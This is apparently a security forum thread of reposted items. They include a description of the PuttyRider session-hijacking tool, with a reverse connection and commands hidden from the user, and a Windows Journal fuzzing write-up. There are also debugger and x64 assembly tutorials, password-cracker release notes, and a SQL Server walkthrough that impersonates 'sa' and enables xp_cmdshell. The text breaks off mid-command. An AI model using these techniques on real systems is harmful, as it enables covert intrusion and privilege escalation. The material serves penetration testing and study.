Nytro

PuttyRider Hijack Putty sessions in order to sniff conversation and inject Linux commands. Download PuttyRider-bin.zip Documentation Defcamp 2014 presentation - pdf Usage Operation modes: -l List the running Putty processes and their connections -w Inject in all existing Putty sessions and wait for new sessions to inject in those also -p PID Inject only in existing Putty session identified by PID. If PID==0, inject in the first Putty found -x Cleanup. Remove the DLL from all running Putty instances -d Debug mode. Only works with -p mode -c CMD Automatically execute a Linux command after successful injection PuttyRider will remove trailing spaces and '&' character from CMD PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD -h Print this help Output modes: -f Write all Putty conversation to a file in the local directory. The filename will have the PID of current putty.exe appended -r IP: PORT Initiate a reverse connection to the specified machine and start an interactive session. Interactive commands (after you receive a reverse connection): !status See if the Putty window is connected to user input !discon Disconnect the main Putty window so it won't display anything This is useful to send commands without the user to notice !recon Reconnect the Putty window to its normal operation mode CMD Linux shell commands !exit Terminate this connection !help Display help for client connection Compiling Use Visual Studio Command Prompt: nmake main dll Acknowledgements Thanks to Brett Moore of Insomnia Security for his proof of concept PuttyHijack Sursa: https://github.com/seastorm/PuttyRider

[h=1]Hackfest 2014: Jason Gillam presented "Web Penetration Testing with Burp and CO2"[/h] Hackfest 2014: Jason Gillam presented "Web Penetration Testing with Burp and CO2" Slides: http://www.hackfest.ca/conf2014/web-p... Talk description: http://www.hackfest.ca/speaker/jason-... Hackfest: Hackfest.ca >> Hackfest November 7th & 8th 2014 | Bilingual event and the biggest security event held in Quebec, Canada in november which has HackingGames, technical conferences and more! Presented by: Hackfest communication Logo by Hackfest Communication & CC flickr jdhancock

CVE-2014-1824 – A New Windows Fuzzing Target Posted November 25, 2014 BeyondTrust Research Team As time progresses, due to constant fuzzing and auditing many common Microsoft products are becoming reasonably hard targets to fuzz and find interesting crashes. There are two solutions to this: write a better fuzzer (american fuzzy lop) or pick a less audited target. In a search for less audited attack surface, we are brought to MS14-038, Vulnerability in Windows Journal Could Allow Remote Code Execution (2975689). Before we start attacking this application, we would like to understand the vulnerability addressed by MS14-038. Windows Journal is a tablet component shipped with Windows Vista forward, meant for taking notes and such. It has a file association of ‘.jnt’. The bulletin doesn’t give too much information, but reveals the problem is some kind of parsing issue. The patch seems to address issues in NBDoc.dll, so let’s look at the bindiff of pre/post patch. The diff is ugly, many functions have changed and a few have been added/removed. So where do we go from here? Looking at the individual changes, we come across a few fixes that look security related, but after numerous dead-ends, one is more attractive than the rest – sub_2ECE0B90. A high level view of this function is seen below. This function is somewhat big and has quite a few changes, but is interesting for a couple reasons: First off, apart from some structural changes, there are several calls to memcpy in the unpatched function. Only one of these has been converted to a memcpy_s in the patched function, the count of which is now passed in as an argument to the function. Secondly, the function looks like it contains some kind of magic value at the top. In the very first basic block, further processing is determined by a call to strncmp, searching for the string “PTC+MSHM”. Perhaps this could be a useful marker for which to search. Assuming that this string is in fact a marker for a path to the vulnerable function we perform a quick Google search. After digging around on archive-ro.com, we end up with a link to a journal file: http://www.phys.ubbcluj.ro/~vasile.chis/cursuri/info/c1.jnt Popping this guy open in a hex editor, we get dozens of hits for PTC+MSHM on a free text search We now proceed dynamically, attempting to trigger a breakpoint in the affected function. We set one in the first block of the function of the unpatched DLL near the call to strncmp on “PTC+MSHM”. Upon hitting it the first time it, the str1 argument looks like this: Grabbing all the bytes up till the second occurrence of 0f61 and flipping the endian, we get two hits in our hex editor, one at offset 0x04df and one at offset 0x2bcb. The second hit is different from the dump, lacking the next word 0b70. So it looks like we are handling this blob at offset 0x04df in the file during the first function call. Continuing on, we set a breakpoint above the memcpy of interest at the top of the block. After some stepping we get to this situation: Well, that 0x0b70 looks familiar… Furtermore, it appears to be pushed as the size parameter to the memcpy. Let’s modify the initial file, changing 700B to FFFF. Restarting the application and opening our modified file, we receive an access violation. So as hoped, we crash in the memcpy and have exercised the vulnerable code. More than this particular vulnerability we are trying to isolate, this crash seems like it may be more indicative of less audited code then, say, MS Word. With visions of unbounded memcpy’s in our eyes, we fired a dumb fuzzer at the current version of Journal – and as expected it fell over pretty quickly and in several unique ways — we encourage you to do the same. Sursa: CVE-2014-1824 – A New Windows Fuzzing Target | BeyondTrust

Writing a Primitive Debugger: Part 3 (Call Stack, Registers, Contexts) Posted on December 5, 2014 by admin Up to now, all of the functionality discussed in writing a debugger has been related to getting a debugger attached to a process and being able to set breakpoints and perform single stepping. While certainly useful, this functionality is more passive debugging: you can break the state of the process at a certain point and instrument it at the instruction level, but you cannot actually modify any behavior, or even view how the process got to that state. The next core functionality that will be covered will detail actually being able to view and change program execution state (in the form of the thread context, namely registers), and being able to view the thread’s call stack upon hitting a breakpoint. Thread Contexts A thread context, as defined relevant to Windows, “includes the thread’s set of machine registers, the kernel stack, a thread environment block, and a user stack in the address space of the thread’s process.” For a usermode debugger, which is what is being developed in these posts, the important parts are the machine registers and the user stack. The thread environment block is also accessible from user-mode but won’t be covered here due to its undocumented and very specific nature. When a process starts up, the loader will set up the processes main thread and begin execution at the entry point. This main thread can in turn launch additional threads, which themselves launch threads, and so on. Each of these threads will have their own context containing the items listed above. The purpose of these contexts is that Windows, being a preemptive multitasking operating system, can have any [usermode] task, such as a thread executing code, interrupted at any point in time. During these interruptions, a context switch will be carried out, which is simply the process of saving the current execution context and setting the new one to execute. Eventually, when the original task is scheduled to resume, a context switch will again occur back to the context of the original thread and it will continue executing as if nothing had happened. What do these contexts look like? The answer is that it is entirely processor-specific, which shouldn’t be too surprising given that they store registers. In Windows, the part of the thread context that is available to developers comes defined as a CONTEXT structure in winnt.h. For example, below is asnippet from a CONTEXT structure for x86 processors. [TABLE] [TR] [TD=class: code]typedef struct _CONTEXT { DWORD Dr0; DWORD Dr1; DWORD Dr2; ... FLOATING_SAVE_AREA FloatSave; DWORD SegGs; DWORD SegFs; ... DWORD Edi; DWORD Esi; DWORD Ebx; ... DWORD Ebp; DWORD Eip; ... [/TD] [/TR] [/TABLE] The x64 version looks pretty closely related, with register widths being extended to 64-bits as well as additional registers and extensions added. [TABLE] [TR] [TD=class: code]typedef struct DECLSPEC_ALIGN(16) _CONTEXT { DWORD ContextFlags; DWORD MxCsr; ... WORD SegGs; WORD SegSs; DWORD EFlags; ... DWORD64 Rax; DWORD64 Rcx; DWORD64 Rdx; ... DWORD64 R13; DWORD64 R14; DWORD64 R15; ...[/TD] [/TR] [/TABLE] This is the structure that will be the most useful to inspect and modify when debugging. A debugger should be able to print out this structure and allow for modification of any of its fields. Fortunately, there are two very useful APIs for retrieving and modifying this structure: GetThreadContext and SetThreadContext. These have been covered previously when discussing how to enable single-stepping. The context had to be retrieved and the EFlags registered modified. So what modifications are needed to the existing code/logic in order to add this functionality? It’s as simple as opening a handle to the current executing (or in the debuggers case, broken) thread and retrieving/setting the context. [TABLE] [TR] [TD=class: code]const CONTEXT Debugger::GetExecutingContext() { CONTEXT ctx = { 0 }; ctx.ContextFlags = CONTEXT_ALL; SafeHandle hThread = OpenCurrentThread(); if (hThread.IsValid()) { bool bSuccess = BOOLIFY(GetThreadContext(hThread(), &ctx)); if (!bSuccess) { fprintf(stderr, "Could not get context for thread %X. Error = %X\n", m_dwExecutingThreadId, GetLastError()); } } memcpy(&m_lastContext, &ctx, sizeof(CONTEXT)); return ctx; } const bool Debugger::SetExecutingContext(const CONTEXT &ctx) { bool bSuccess = false; SafeHandle hThread = OpenCurrentThread(); if (hThread.IsValid()) { bSuccess = BOOLIFY(SetThreadContext(hThread(), &ctx)); } memcpy(&m_lastContext, &ctx, sizeof(CONTEXT)); return bSuccess; }[/TD] [/TR] [/TABLE] For each access or modification, there is a handle opened (and closed) to the current thread — this certainly isn’t the most efficient approach, but serves well enough for demo purposes. The state of the context is then stored in m_lastContext. These functions are invoked when the process receives an EXCEPTION_BREAKPOINT and when single stepping the process, i.e. handling the EXCEPTION_SINGLE_STEP exception. Therefore, m_lastContext will always have the appropriate register values in the context structure when a breakpoint is hit or when the user is single stepping. These functions can also be invoked when the user wants to modify a certain register or registers through the debugger interface. Printing the context involves nothing more than printing out the values in the structure. I’ve chosen to only print out the more commonly used registers for the example code: [TABLE] [TR] [TD=class: code]void Debugger::PrintContext() { #ifdef _M_IX86 fprintf(stderr, "EAX: %p EBX: %p ECX: %p EDX: %p\n" "ESP: %p EBP: %p ESI: %p EDI: %p\n" "EIP: %p FLAGS: %X\n", m_lastContext.Eax, m_lastContext.Ebx, m_lastContext.Ecx, m_lastContext.Edx, m_lastContext.Esp, m_lastContext.Ebp, m_lastContext.Esi, m_lastContext.Edi, m_lastContext.Eip, m_lastContext.EFlags); #elif defined _M_AMD64 fprintf(stderr, "RAX: %p RBX: %p RCX: %p RDX: %p\n" "RSP: %p RBP: %p RSI: %p RDI: %p\n" "R8: %p R9: %p R10: %p R11: %p\n" "R12: %p R13: %p R14: %p R15: %p\n" "RIP: %p FLAGS: %X\n", m_lastContext.Rax, m_lastContext.Rbx, m_lastContext.Rcx, m_lastContext.Rdx, m_lastContext.Rsp, m_lastContext.Rbp, m_lastContext.Rsi, m_lastContext.Rdi, m_lastContext.R8, m_lastContext.R9, m_lastContext.R10, m_lastContext.R11, m_lastContext.R12, m_lastContext.R13, m_lastContext.R14, m_lastContext.R15, m_lastContext.Rip, m_lastContext.EFlags); #else #error "Unsupported architecture" #endif }[/TD] [/TR] [/TABLE] Call Stacks At the lowest level, the scope of a function is defined by its stack frame. This is a compiler and/or ABI defined construct for how the state of the function will be layed out. A stack frame typically includes the return address of the caller, any parameters that were passed to the function from the caller, and space for local variables that exist within the scope of the function. For x86 and x64, among other architectures, these stack frames are preceded with a prologue, which is the code responsible for setting up the stack and frame pointers (ESP/EBP or RSP/RBP) from the caller to the callee. Prior to the callee returning, there is an epilogue, which is responsible for returning the stack and frame pointers to that of the caller. For example, consider the following C function: [TABLE] [TR] [TD=class: code]void TestFunction(int a, int b, int c) { int d = 4, e = 5, f = 6; }[/TD] [/TR] [/TABLE] which was called in the following way [TABLE] [TR] [TD=class: code]push 3 push 2 push 1 call TestFunction[/TD] [/TR] [/TABLE] Disassembled as x86, this becomes: push ebp mov ebp,esp sub esp,0Ch mov dword ptr [ebp-4],4 mov dword ptr [ebp-8],5 mov dword ptr [ebp-0Ch],6 mov esp,ebp pop ebp ret 0Ch The prologue and epilogue are highlighted in orange. After the execution of the prologue, the stack frame for this function will contain the callers frame pointer in [EBP], the return address at [EBP+4] (because the CALL instruction implicitly pushes the address of the next instruction on the stack before changing execution), and the passed parameters at [EBP+8], [EBP+12], and [EBP+16]. The prologue subtracted 12 from the base of the stack to make room for local variables — the three 32-bit ints declared within the function. These will be at [EBP-4], [EBP-8], and [EBP-12], as can be see in the disassembly. This setup is pretty convenient because it offers easy distinction between what is a parameter and what is a local variable. Debugging becomes a bit easier since everything is held on the stack and indexed through the frame pointer, rather than scattered around between registers and the stack. This changes a bit as you go from x86 to x64, where x64 will store the first four (or six, depending on your compiler/platform) arguments in registers, and the rest on the stack. This can also change a bit depending on calling conventions and compiler optimizations, especially frame-pointer omission. Since the stack frame stores the return address of the caller, it is possible to see where the function was called from. That is what the call stack is: a collection of stack frames that represent the call chain in the code leading up to the current stack frame. This information is very useful to have in terms of debugging, because a bug that presented itself in one function may have manifested earlier on in the code. Being able to quickly traverse frames, and see the values within those frames, is an invaluable aid to debugging. On the Windows platform, there is a convenient function that performs the tedium/annoyance of walking stack frames backwards: StackWalk64. This function is x86 and x64 compatible, but does require some setup prior to being invoked. Given the very machine-specific layout of stack frames, the StackWalk64 function requires filling out a STACKFRAME64 structure, which will be passed to it as an argument. Filling out this structure merely involves setting the instruction, frame, and stack pointers, along with the address modes, which will be flat addressing for the case of modern Windows on x86 and x64. Once this structure is set up, StackWalk64 can be called in a loop to retrieve the frames. Put into code, it looks like the following: [TABLE] [TR] [TD=class: code]void Debugger::PrintCallStack() { STACKFRAME64 stackFrame = { 0 }; const DWORD_PTR dwMaxFrames = 50; CONTEXT ctx = GetExecutingContext(); stackFrame.AddrPC.Mode = AddrModeFlat; stackFrame.AddrFrame.Mode = AddrModeFlat; stackFrame.AddrStack.Mode = AddrModeFlat; #ifdef _M_IX86 DWORD dwMachineType = IMAGE_FILE_MACHINE_I386; stackFrame.AddrPC.Offset = ctx.Eip; stackFrame.AddrFrame.Offset = ctx.Ebp; stackFrame.AddrStack.Offset = ctx.Esp; #elif defined _M_AMD64 DWORD dwMachineType = IMAGE_FILE_MACHINE_AMD64; stackFrame.AddrPC.Offset = ctx.Rip; stackFrame.AddrFrame.Offset = ctx.Rbp; stackFrame.AddrStack.Offset = ctx.Rsp; #else #error "Unsupported platform" #endif SafeHandle hThread = OpenCurrentThread(); for (int i = 0; i < dwMaxFrames; ++i) { const bool bSuccess = BOOLIFY(StackWalk64(dwMachineType, m_hProcess(), hThread(), &stackFrame, (dwMachineType == IMAGE_FILE_MACHINE_I386 ? nullptr : &ctx), nullptr, SymFunctionTableAccess64, SymGetModuleBase64, nullptr)); if (!bSuccess || stackFrame.AddrPC.Offset == 0) { fprintf(stderr, "StackWalk64 finished.\n"); break; } fprintf(stderr, "Frame: %X\n" "Execution address: %p\n" "Stack address: %p\n" "Frame address: %p\n", i, stackFrame.AddrPC.Offset, stackFrame.AddrStack.Offset, stackFrame.AddrFrame.Offset); } }[/TD] [/TR] [/TABLE] Testing the functionality To test this functionality we can create another demo app that will be used as the debug target. The simple one below is what I used: [TABLE] [TR] [TD=class: code]#include <cstdio> void d() { printf("d called.\n"); } void c() { printf("c called.\n"); d(); } void b() { printf("b called.\n"); c(); } void a() { printf("a called.\n"); b(); } int main(int argc, char *argv[]) { printf("Addresses: \n" "a: %p\n" "b: %p\n" "c: %p\n" "d: %p\n", a, b, c, d); getchar(); while (true) { a(); getchar(); } return 0; }[/TD] [/TR] [/TABLE] I would recommend disabling incremental linking and ASLR (on the executable, not the system) for convenience sake. Below is the stack trace that Visual Studio produces when a breakpoint is set inside the d function and hit. Demo.exe!d() Line 5 C++ Demo.exe!c() Line 14 C++ Demo.exe!b() Line 20 C++ Demo.exe!a() Line 26 C++ Demo.exe!main(int argc, char * * argv) Line 41 C++ Demo.exe!__tmainCRTStartup() Line 626 C Demo.exe!mainCRTStartup() Line 466 C kernel32.dll!@BaseThreadInitThunk@12() Unknown ntdll.dll!___RtlUserThreadStart@8() Unknown ntdll.dll!__RtlUserThreadStart@8() Unknown Attaching with the debugger also yields 10 frames, as listed below: a Target address: 0x4010f0 Received breakpoint at address 004010F0 Press c to continue or s to begin stepping. l Frame: 0 Execution address: 004010F0 Stack address: 00000000 Frame address: 0018FBE4 Frame: 1 Execution address: 004010DA Stack address: 00000000 Frame address: 0018FBE8 Frame: 2 Execution address: 0040108A Stack address: 00000000 Frame address: 0018FCBC Frame: 3 Execution address: 0040103A Stack address: 00000000 Frame address: 0018FD90 Frame: 4 Execution address: 004011C6 Stack address: 00000000 Frame address: 0018FE64 Frame: 5 Execution address: 00401699 Stack address: 00000000 Frame address: 0018FF38 Frame: 6 Execution address: 004017DD Stack address: 00000000 Frame address: 0018FF88 Frame: 7 Execution address: 75D5338A Stack address: 00000000 Frame address: 0018FF90 Frame: 8 Execution address: 77339F72 Stack address: 00000000 Frame address: 0018FF9C Frame: 9 Execution address: 77339F45 Stack address: 00000000 Frame address: 0018FFDC StackWalk64 finished. The output is a bit less elegant than the Visual Studio debugger, but it is correct, which is the more important part. It would be nice, however, to put names to some of those addresses. That is where symbol loading and mapping come in, which will be the subject of the next post. Article Roadmap Future posts will be related on topics closely following the items below: Basics Adding/Removing Breakpoints, Single-stepping Call Stack, Registers, Contexts Symbols Miscellaneous Features The full source code relating to this can be found here. C++11 features were used, so MSVC 2012/2013 is most likely required. Follow me Sursa: Writing a Primitive Debugger: Part 3 (Call Stack, Registers, Contexts) | RCE Endeavors

Say hello to x64 Assembly [part 1] Introduction There are many developers between us. We write a tons of code every day. Sometime, it is even not a bad code Every of us can easily write the simplest code like this: [TABLE=class: lines highlight] [TR] [TD=class: line-numbers] 1 [/TD] [TD=class: line-data] #include <stdio.h> int main() { int x = 10; int y = 100; printf("x + y = %d", x + y); return 0; } [/TD] [/TR] [/TABLE] view raw gistfile1.c hosted with ? by GitHub Every of us can understand what's this C code does. But... How this code works at low level? I think that not all of us can answer on this question, and me too. I thought that i can write code on high level programming languages like Haskell, Erlang, Go and etc..., but i absolutely don't know how it works at low level, after compilation. So I decided to take a few deep steps down, to assembly, and to describe my learning way about this. Hope it will be interesting, not only for me. Something about 5 - 6 years ago I already used assembly for writing simple programs, it was in university and i used Turbo assembly and DOS operating system. Now I use Linux-x86-64 operating system. Yes, must be big difference between Linux 64 bit and DOS 16 bit. So let's start. Preparation Before we started, we must to prepare some things like As I wrote about, I use Ubuntu (Ubuntu 14.04.1 LTS 64 bit), thus my posts will be for this operating system and architecture. Different CPU supports different set of instructions. I use Intel Core i7 870 processor, and all code will be written processor. Also i will use nasm assembly. You can install it with: sudo apt-get install nasm It's version must be 2.0.0 or greater. I use NASM version 2.10.09 compiled on Dec 29 2013 version. And the last part, you will need in text editor where you will write you assembly code. I use Emacs with nasm-mode.el for this. It is not mandatory, of course you can use your favourite text editor. If you use Emacs as me you can download nasm-mode.el and configure your Emacs like this: [TABLE=class: lines highlight] [TR] [TD=class: line-numbers] 1 2 3[/TD] [TD=class: line-data] (load "~/.emacs.d/lisp/nasm.el") (require 'nasm-mode) (add-to-list 'auto-mode-alist '("\\.\\(asm\\|s\\)$" . nasm-mode)) [/TD] [/TR] [/TABLE] view raw gistfile1.el hosted with ? by GitHub That's all we need for this moment. Other tools will be describe in next posts. x64 syntax Here I will not describe full assembly syntax, we'll mention only those parts of the syntax, which we will use in this post. Usually NASM program divided into sections. In this post we'll meet 2 following sections: data section text section The data section is used for declaring constants. This data does not change at runtime. You can declare various math or other constants and etc... The syntax for declaring data section is: section .data The text section is for code. This section must begin with the declaration global _start, which tells the kernel where the program execution begins. section .text global _start _start: Comments starts with ; symbol. Every NASM source code line contains some combination of the following four fields: [label:] instruction [operands] [; comment] Fields which are in square brackets are optional. A basic NASM instruction consists from two parts. The first one is the name of the instruction which is to be executed, and the second are the operands of this command. For example: MOV COUNT, 48 ; Put value 48 in the COUNT variable Hello world Let's write first program with NASM assembly. And of course it will be traditional Hello world program. Here is the code of it: [TABLE=class: lines highlight] [TR] [TD=class: line-numbers] 1 [/TD] [TD=class: line-data] section .data msg db "hello, world!" section .text global _start _start: mov rax, 1 mov rdi, 1 mov rsi, msg mov rdx, 13 syscall mov rax, 60 mov rdi, 0 syscall [/TD] [/TR] [/TABLE] view raw gistfile1.asm hosted with ? by GitHub Yes, it doesn't look like printf("Hello world"). Let's try to understand what is it and how it works. Take a look 1-2 lines. We defined data section and put there msg constant with Hello world value. Now we can use this constant in our code. Next is declaration text section and entry point of program. Program will start to execute from 7 line. Now starts the most interesting part. We already know what is it mov instruction, it gets 2 operands and put value of second to first. But what is it these rax, rdi and etc... As we can read at wikipedia: A central processing unit (CPU) is the hardware within a computer that carries out the instructions of a computer program by performing the basic arithmetical, logical, and input/output operations of the system. Ok, CPU performs some operations, arithmetical and etc... But where can it get data for this operations? The first answer in memory. However, reading data from and storing data into memory slows down the processor, as it involves complicated processes of sending the data request across the control bus. Thus CPU has own internal memory storage locations called registers: So when we write mov rax, 1, it means to put 1 to the rax register. Now we know what is it rax, rdi, rbx and etc... But need to know when to use rax but when rsi and etc... rax - temporary register; when we call a syscal, rax must contain syscall number rdx - used to pass 3rd argument to functions rdi - used to pass 1st argument to functions rsi - pointer used to pass 2nd argument to functions In another words we just make a call of sys_write syscall. Take a look on sys_write: [TABLE=class: lines highlight] [TR] [TD=class: line-numbers] 1[/TD] [TD=class: line-data] ssize_t sys_write(unsigned int fd, const char * buf, size_t count) [/TD] [/TR] [/TABLE] view raw gistfile1.c hosted with ? by GitHub It has 3 arguments: fd - file descriptor. Can be 0, 1 and 2 for standard input, standard output and standard error buf - points to a character array, which can be used to store content obtained from the file pointed to by fd. count - specifies the number of bytes to be written from the file into the character array So we know that sys_write syscall takes three arguments and has number one in syscall table. Let's look again to our hello world implementation. We put 1 to rax register, it means that we will use sys_write system call. In next line we put 1 to rdi register, it will be first argument of sys_write, 1 - standard output. Then we store pointer to msg at rsi register, it will be second buf argument for sys_write. And then we pass the last (third) parameter (length of string) to rdx, it will be third argument of sys_write. Now we have all arguments of sys_write and we can call it with syscall function at 11 line. Ok, we printed "Hello world" string, now need to do correctly exit from program. We pass 60 to rax register, 60 is a number of exit syscall. And pass also 0 to rdi register, it will be error code, so with 0 our program must exit successfully. That's all for "Hello world". Quite simple Now let's build our program. For example we have this code in hello.asm file. Then we need to execute following commands: nasm -f elf64 -o hello.o hello.asm ld -o hello hello.o After it we will have executable hello file which we can run with ./hello and will see Hello world string in the terminal. Conclusion It was a first part with one simple-simple example. In next part we will see some arithmetic. If you will have any questions/suggestions write me a comment. All source code you can find - here. Sursa: Code as Art: Say hello to x64 Assembly [part 1]

Hydra Network Logon Cracker 8.1 Authored by van Hauser, thc | Site thc.org THC-Hydra is a high quality parallelized login hacker for Samba, Smbnt, Cisco AAA, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. Includes SSL support, parallel scans, and is part of Nessus. Changes: Multiple patches added. The -M option is fixed. Various other small fixes and enhancements. Download: Download: Hydra Network Logon Cracker 8.1 ? Packet Storm Sursa: Hydra Network Logon Cracker 8.1 ? Packet Storm

THC Smartbrute 1.0 Authored by thc | Site thc.org THC-smartbrute is a smart card instruction bruteforcing tool. Download: Download: THC Smartbrute 1.0 ? Packet Storm Sursa: THC Smartbrute 1.0 ? Packet Storm

[h=2]Hacking SQL Server Stored Procedures – Part 2: User Impersonation[/h] Scott Sutherland | December 8, 2014 Application developers often use SQL Server stored procedures to make their code more modular, and help apply the principle of least privilege. Occasionally those stored procedures need to access resources external to their application’s database. In order to satisfy that requirement sometimes developers use the IMPERSONATE privilege and the EXECUTE AS function to allow the impersonation of other logins on demand. Although this isn’t really a vulnerability, this type of weak configuration often leads to privilege escalation. This blog provides a lab guide and attack walk-through that can be used to gain a better understanding of how the IMPERSONATE privilege can lead to privilege escalation in SQL Server. This should be interesting to penetration testers, application developers, and dev-ops. However, it will most likely be pretty boring to DBAs that know what they’re doing. Below is a summary of the topics being covered: Setting up a Lab Finding SQL Server Logins that can be Impersonated Impersonating SQL Logins and Domain Accounts Automating Escalation with Metasploit and PowerShell Alternatives to Impersonation [h=2]Setting up a Lab[/h] Below I’ve provided some basic steps for setting up a SQL Server instance that can be used to replicate the scenario covered in this blog. Download the Microsoft SQL Server Express install that includes SQL Server Management Studio. It can be download at Download Microsoft SQL Server 2014 Express. Install SQL Server by following the wizard, but make sure to enabled mixed-mode authentication and run the service as LocalSystem for the sake of the lab. Make sure to enable the tcp protocol so that we can connect to the listener remotely. Instructions can be found at How to: Configure Express to accept remote connections - SQL Server Express WebLog - Site Home - MSDN Blogs. Log into the SQL Server with the “sa” account setup during the installation using the SQL Server Management Studio application that comes with SQL Server. Press the “New Query” button and use the TSQL below to create the new users for the lab. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Create login 1 CREATE LOGIN MyUser1 WITH PASSWORD = 'MyPassword!'; -- Create login 2 CREATE LOGIN MyUser2 WITH PASSWORD = 'MyPassword!'; -- Create login 3 CREATE LOGIN MyUser3 WITH PASSWORD = 'MyPassword!'; -- Create login 4 CREATE LOGIN MyUser4 WITH PASSWORD = 'MyPassword!'; [/TD] [/TR] [/TABLE] Provide the MyUser1 login with permissions to impersonate MyUser2, MyUser3, and sa. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Grant myuser1 impersonate privilege on myuser2, myuser3, and sa USE master; GRANT IMPERSONATE ON LOGIN::sa to [MyUser1]; GRANT IMPERSONATE ON LOGIN::MyUser2 to [MyUser1]; GRANT IMPERSONATE ON LOGIN::MyUser3 to [MyUser1]; GO [/TD] [/TR] [/TABLE] [h=2]Finding SQL Server Logins that can be impersonated[/h] The first step to impersonating another login is findings which ones your account is allowed to impersonate. By default, sysadmins can impersonate anyone, but normal logins must be assigned privileges to impersonate specific users. Below are the instructions for finding out what users you can impersonate. Log into the SQL Server as the MyUser1 login using SQL Server Management Studio. Run the query below to get a list of logins that can be impersonated by the “MyUser1” login. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Find users that can be impersonated SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' [/TD] [/TR] [/TABLE] Below is a screenshot of the expected results. Note: In the example above, the query is being executed via a direct database connection, but in the real world external attackers are more likely to execute it via SQL injection. [h=2]Impersonating SQL Logins and Domain Accounts[/h] Now that we have a list of logins that we know we can impersonate we can start escalating privileges. J In this section I’ll show how to impersonate users, revert to your original user, and impersonate domain users (like the domain admin). Fun fun fun… [h=3]Impersonating SQL Server Logins[/h] Log into the SQL Server using the MyUser1 login (if you’re not already). Verify that you are running as a SQL login that does not have the sysadmin role. Then run EXECTUTE AS to impersonate the sa login that was identified in the last section. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Verify you are still running as the myuser1 login SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') -- Impersonate the sa login EXECUTE AS LOGIN = 'sa' -- Verify you are now running as the sa login SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') [/TD] [/TR] [/TABLE] Below is an example of the expected output. Now you should be able to access any database and enable/run xp_cmdshell to execute commands on the operating system as the SQL Service service account (LocalSystem). Below is some example code. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Enable show options EXEC sp_configure 'show advanced options',1 RECONFIGURE GO -- Enable xp_cmdshell EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE GO -- Quickly check what the service account is via xp_cmdshell EXEC master..xp_cmdshell 'whoami' [/TD] [/TR] [/TABLE] Below is an example of the expected output: Tada! In this scenario we were able to become the sysadmin “sa”. You may not always get a sysadmin account right out of the gate, but at a minimum you should get additional data access when impersonating other logins. Note: Even a small increase in privileges can provide the first step in an escalation chain. For example, if you have the rights to impersonate a db_owner you may be able to escalate to a syadmin using the attack I covered in my last blog. It can be found here. [h=3]Impersonating SQL Logins as Sysadmin[/h] Once you’ve obtained a sysadmin account you have the ability to impersonate database login you want. You can grab a full list of logins from the . [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Get a list of logins SELECT * FROM master.sys.sysusers WHERE islogin = 1 [/TD] [/TR] [/TABLE] Screenshot below: Once you have the list it’s pretty easy to become anyone. Below is an example of impersonating the MyUser4 login. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Verify you are still impersonating sa select SYSTEM_USER select IS_SRVROLEMEMBER('sysadmin') -- Impersonate MyUser4 EXECUTE AS LOGIN = 'MyUser4' -- Verify you are now running as the the MyUser4 login SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') -- Change back to sa REVERT [/TD] [/TR] [/TABLE] Below is a screenshot: Note: Make sure to REVERT back to the sysadmin account when you’re done. Otherwise you’ll continue to run under the context of the MyUser4 login. [h=3]Impersonating Domain Admins as a Sysadmin[/h] Did I mention that you can impersonate any user in Active Directory? As it turns out it doesn’t even have to be mapped to an SQL Server login. However, the a catch is that it only applies to the SQL Server. That’s mostly because the SQL Server has no way to authenticate the Domain User to another system…that I’m aware of. So it’s not actually as cool as it sounds, but still kind of fun. Note: Another important note is that when you run xp_cmdshell while impersonating a user all of the commands are still executed as the SQL Server service account, NOT the SQL Server login or impersonated domain user. Below is a basic example of how to do it: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Get the domain of the SQL Server SELECT DEFAULT_DOMAIN() -- Impersonate the domain administrator EXECUTE AS LOGIN = 'DEMO\Administrator' -- Verify you are now running as the Domain Admin SELECT SYSTEM_USER [/TD] [/TR] [/TABLE] Note: Remember that the domain will be different for everyone. In my example the domain is “DEMO”. Below is an example of the expected output. Revert to the original Login If you get sick of being a sysadmin or a Pseudo Domain Admin you can always REVERT to your original login again. Just be aware that if you run the impersonation multiple times you may have to run REVERT multiple times. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Revert to your original login REVERT -- Verify you are now running as the MyUser1 login SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') [/TD] [/TR] [/TABLE] [h=2]1.5 Automating Escalation with Metasploit and PowerShell[/h] Since I’m lazy and don’t like to type more that I have to, I wrote a Metasploit module and PowerShell script to automate the attack for direct database connections. I also wrote a Metasploit module to execute the escalation via error based SQL injection. Big thanks to guys on the Metasploit team who helped me get the modules into the framework. [h=3]Metasploit Module: mssql_escalate_executeas[/h] Below is an example of the mssql_escalate_executeas module being used to escalate the privileges of the myuser1 login using a direct database connection. Typically this would happen during an internal penetration test after guessing database user/passwords or finding database connection strings. [h=3]Metasploit Module: mssql_escalate_executeas_sqli[/h] Below is an example of the mssql_escalate_executeas_sqli module being used to escalate the privileges of the myuser1 login using error based SQL injection. This is more practical during external network penetration tests. Mostly because SQL injection is pretty common and database ports usually are not exposed to the internet. Anyway pretty screenshot below… [h=3]PowerShell Script[/h] For those who like to play around with PowerShell, I also put a script together that can be used to escalate the privileges of the myuser1 login via a direct database connection. It can be downloaded from https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1. The module can be imported with the command below. Also, I’m aware the name is comically long, but at this point I’m just trying to be descriptive. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] Import-Module 